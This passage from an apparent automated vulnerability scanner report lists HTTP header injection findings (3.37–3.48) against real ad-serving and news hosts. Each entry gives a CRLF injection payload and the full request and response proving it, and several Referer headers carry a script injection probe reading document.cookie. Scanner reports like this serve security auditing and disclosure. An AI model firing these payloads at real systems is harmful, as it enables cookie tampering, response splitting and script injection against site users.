User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1305033341; mt_mop=10004:1305033341|4:1305033320

Response

HTTP/1.1 404 Not found
Date: Tue, 10 May 2011 14:02:44 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - dc7ea
298f1c0e803

x-mm-host: ewr-bidder-x1
Connection: keep-alive

Request not found

3.37. http://bidder.mathtag.com/notify [exch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload 68687%0d%0aa56fdd7572e was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /notify?exch=68687%0d%0aa56fdd7572e&id=5aW95q2jLzEvWVdNMVlXWmxPRGt0WkdKbE15MDBZVGs1TFRsak5qQXROVGxtTkdaaU5EazFZMkk1L05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy81NjU3MTY4NzExMDE4MDYzOS8xMTUwMDIvMTAwNDcwLzIvUTNBbV9DbnBmUVVnTncyOVZSNGhUaExDNUJ2ZDlwZFdUeXJ0ZExOblVpYy8/yud4hlXv4H9X9GSrDaYFPckyYXo&price=7.185200 HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo?t=1305033240941&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304957840; ts=1305033239

Response

HTTP/1.1 404 Not found
Date: Tue, 10 May 2011 13:25:01 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - 68687
a56fdd7572e

x-mm-host: ewr-bidder-x1
Connection: keep-alive

Request not found

3.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload e4909%0d%0aa1382fbc11a was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4878102~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~416~0~01020^ebAboveTheFoldDuration~416~0~01020&OptOut=0&ebRandom=0.4362495185382129&flv=e4909%0d%0aa1382fbc11a&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Origin: http://www.philly.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=d14259c0-4e0c-443e-b352-a1e8fb4065ba3I0060; expires=Mon, 08-Aug-2011 10:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=e4909
a1382fbc11a
&RES=128&WMPV=0; expires=Mon, 08-Aug-2011 10: 31:25 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 10 May 2011 14:31:24 GMT
Connection: close
Content-Length: 0


3.39. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 2240b%0d%0ae3c9c429ade was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4878102~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~416~0~01020^ebAboveTheFoldDuration~416~0~01020&OptOut=0&ebRandom=0.4362495185382129&flv=0&wmpv=0&res=2240b%0d%0ae3c9c429ade HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Origin: http://www.philly.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=377eeade-84a3-4f19-a129-ab5e2e6932fa3I0090; expires=Mon, 08-Aug-2011 10:31:26 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=0&RES=2240b
e3c9c429ade
&WMPV=0; expires=Mon, 08-Aug-2011 10: 31:26 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 10 May 2011 14:31:26 GMT
Connection: close
Content-Length: 0


3.40. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 2d122%0d%0ad16c5480c76 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4878102~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~416~0~01020^ebAboveTheFoldDuration~416~0~01020&OptOut=0&ebRandom=0.4362495185382129&flv=0&wmpv=2d122%0d%0ad16c5480c76&res=128 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Origin: http://www.philly.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=053133e7-d2a3-4d34-8410-525610354b8f3I0020; expires=Mon, 08-Aug-2011 10:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=0&RES=128&WMPV=2d122
d16c5480c76
; expires=Mon, 08-Aug-2011 10: 31:25 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 10 May 2011 14:31:25 GMT
Connection: close
Content-Length: 0


3.41. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-406/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 8afe9%0d%0aaf29ca98fb5 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-406/c5/jsc/fmr.js?c=4479/4088/1&a=0&f=&n=305&r=13&d=15&q=&$=8afe9%0d%0aaf29ca98fb5&s=1128&z=0.20179314771667123 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1; FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1; FFgeo=2241452; PI=h1023448Za926090Zc305005676%2C305005676Zs1423Zt1129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:8afe9
af29ca98fb5
;expires=Wed, 11 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,4479,15;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968:305,4479#940496|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1:0,18,1;expires=Thu, 09 Jun 2011 13:25:32 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFSkp=305,4479,15,1:;expires=Wed, 11 May 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "90e70110-8181-4a1e245688080"
Vary: Accept-Encoding
X-Varnish: 545954342 545954007
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=391
Expires: Tue, 10 May 2011 13:32:03 GMT
Date: Tue, 10 May 2011 13:25:32 GMT
Connection: close
Content-Length: 7326

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1128;var zzPat=',8afe9
...[SNIP]...

3.42. http://c7.zedo.com/utils/ecSet.js [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 3489c%0d%0ac03fe54ce09 was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=3489c%0d%0ac03fe54ce09&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1; FFgeo=2241452; PI=h1023448Za926090Zc305005676%2C305005676Zs1423Zt1129; ZCBC=1; FFSkp=305,4479,15,1:; FFcat=305,4479,15; FFad=0; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968:305,4479#945899|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1:0,18,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 3489c
c03fe54ce09
;expires=Thu, 09 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=3708
Date: Tue, 10 May 2011 13:25:34 GMT
Connection: close



3.43. http://d.xp1.ru4.com/activity [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload da244%0d%0a0f6a8658bab was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=da244%0d%0a0f6a8658bab&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo?t=1305033240941&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452; O1807966=16; P1807966=c3N2X2MyfFl8MTMwNDM2MDM2MHxzc3ZfYnxjMnwxMzA0MzYwMzYwfHNzdl8xfDI4NTQ0NTQ3M3wxMzA0MzYwMzYwfA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 10 May 2011 13:25:07 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://da244
0f6a8658bab
?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
Connection: close


3.44. http://politics.gather.com/js/commenting.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://politics.gather.com
Path:   /js/commenting.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9695a%0d%0a1f4ecfd236 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /js/9695a%0d%0a1f4ecfd236?18185 HTTP/1.1
Host: politics.gather.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7529E6AE6191662AF7FFA12DC6E30990; vis=IL3kPIJ/j/1xZedPQlMWF0oRm+S8xbqzecbX6qOuxS2uZgZwvNHVrznIDPkUuypt2qw+TToQII1aLPO5TlnGt8iivc5mAOxZDlGv2Bt4jLT4QxKKwJ+ccFL7YaPHe2QR; gathersid=www07

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 10 May 2011 13:16:51 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Location: http://www.gather.com/js/9695a
1f4ecfd236

Content-Length: 0
Content-Type: text/html;charset=UTF-8


3.45. http://politics.gather.com/js/siteReport.js.jspf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://politics.gather.com
Path:   /js/siteReport.js.jspf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 68430%0d%0a6eb91d66aab was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /js/68430%0d%0a6eb91d66aab?18185 HTTP/1.1
Host: politics.gather.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7529E6AE6191662AF7FFA12DC6E30990; vis=IL3kPIJ/j/1xZedPQlMWF0oRm+S8xbqzecbX6qOuxS2uZgZwvNHVrznIDPkUuypt2qw+TToQII1aLPO5TlnGt8iivc5mAOxZDlGv2Bt4jLT4QxKKwJ+ccFL7YaPHe2QR; gathersid=www07

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 10 May 2011 13:16:42 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Location: http://www.gather.com/js/68430
6eb91d66aab

Content-Length: 0
Content-Type: text/html;charset=UTF-8


3.46. http://politics.gather.com/viewArticle.action [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://politics.gather.com
Path:   /viewArticle.action

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d1c40%0d%0ada2b4770962 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d1c40%0d%0ada2b4770962?articleId=281474979309848 HTTP/1.1
Host: politics.gather.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 10 May 2011 13:15:46 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=F072A1362457E9AA019C1C921ECBB27A; Domain=.gather.com; Path=/
Set-Cookie: vis=UpaMeCxC7omqbrijp2KbL/MUIG2sDp6U6nijlaPvAYBKBPTx/gUWgbIx3xlhc5t/wmKSD+84cneR895eDEjeO1sXGWt6WL74rv+kstIq/BM=; Domain=gather.com; Expires=Mon, 05-May-2031 13:15:46 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=V4KohYPrJU2o32JtCv0BQg+EP2KssYlfiyJ3tq9u4afVb7Lwg6CL2XGtuxHWTMN7ATxaIwqStE+O81bnyJBvZGU6xAX4Z9xPZHxrgLEOomdsCTFVTXLkFYJCkaCM+BaP; Domain=gather.com; Expires=Mon, 05-May-2031 13:15:46 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Location: http://www.gather.com/d1c40
da2b4770962

Content-Length: 0
Content-Type: text/html;charset=UTF-8


3.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 2157c%0d%0a832059ca924 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=18303&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=14952 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305562739|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676|57126^1^1305562704; TData=99999|^|51134|56281|50086|50085|60740|57130|53380|60490|60512|60489|57149|60515|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|60146|52576|56969|56835|56780|57372|56761; N=2:075830f4860e794d16ad1f8cf1dc6ff2,aff3a0d34f874c485c6aff040641c1902157c%0d%0a832059ca924; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NjA3NDA6NTcxMzA6NTMzODA6NjA0OTA6NjA1MTI6NjA0ODk6NTcxNDk6NjA1MTU6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NjAxNDY6NTI1NzY=; AxData=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:53:31 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Tue, 10 May 2011 14:08:31 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Fri, 04-May-12 13:53:31 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305640411|60130^1^1305560226|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305562739|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676|57126^1^1305562704; path=/; expires=Tue, 17-May-11 13:53:31 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1305035611^1305037411|18303^1305035611^1305037411; path=/; expires=Tue, 10-May-11 14:23:31 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|57094|60740|50085|50086|57130|50963|60491|60512|51186|56281|53380|60489|60515|57149|52615|60490|53656|55401|50507|60506|54255|57144|60509|54243|51182|50961|54209|56419|52576|56969|56835|56780|57372|56761; expires=Fri, 04-May-12 13:53:31 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:aff3a0d34f874c485c6aff040641c1902157c
832059ca924
,e93692b4245f9caf3a3a6cab8d3d53be; expires=Fri, 04-May-12 13:53:31 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTcwOTQ6NjA3NDA6NTAwODU6NTAwODY6NTcxMzA6NTA5NjM6NjA0OTE6NjA1MTI6NTExODY6NTYyODE6NTMzODA6NjA0ODk6NjA1MTU6NTcxNDk6NTI2MTU6NjA0OTA6NTM2NTY6NTU0MDE6NTA1MDc6NjA1MDY6NTQyNTU6NTcxNDQ6NjA1MDk6NTQyNDM6NTExODI6NTA5NjE6NTQyMDk6NTY0MTk6NTI1NzY=; expires=Fri, 04-May-12 13:53:31 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|57094|60740|50085|50086|57130|50963|60491|60512|51186|56281|53380|60489|60515|57149|52615|60490|53656|55401|
...[SNIP]...

3.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload af27a%0d%0a3f3a13db1d1 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=af27a%0d%0a3f3a13db1d1&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=14952 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305562739|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676|57126^1^1305562704; TData=99999|^|51134|56281|50086|50085|60740|57130|53380|60490|60512|60489|57149|60515|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|60146|52576|56969|56835|56780|57372|56761; N=2:075830f4860e794d16ad1f8cf1dc6ff2,aff3a0d34f874c485c6aff040641c190; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NjA3NDA6NTcxMzA6NTMzODA6NjA0OTA6NjA1MTI6NjA0ODk6NTcxNDk6NjA1MTU6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NjAxNDY6NTI1NzY=; AxData=

Response

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:48:16 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Tue, 10 May 2011 14:03:16 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Fri, 04-May-12 13:48:16 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305640096|60130^1^1305560226|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305562739|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676|57126^1^1305562704; path=/; expires=Tue, 17-May-11 13:48:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1305035296^1305037096|af27a
3f3a13db1d1
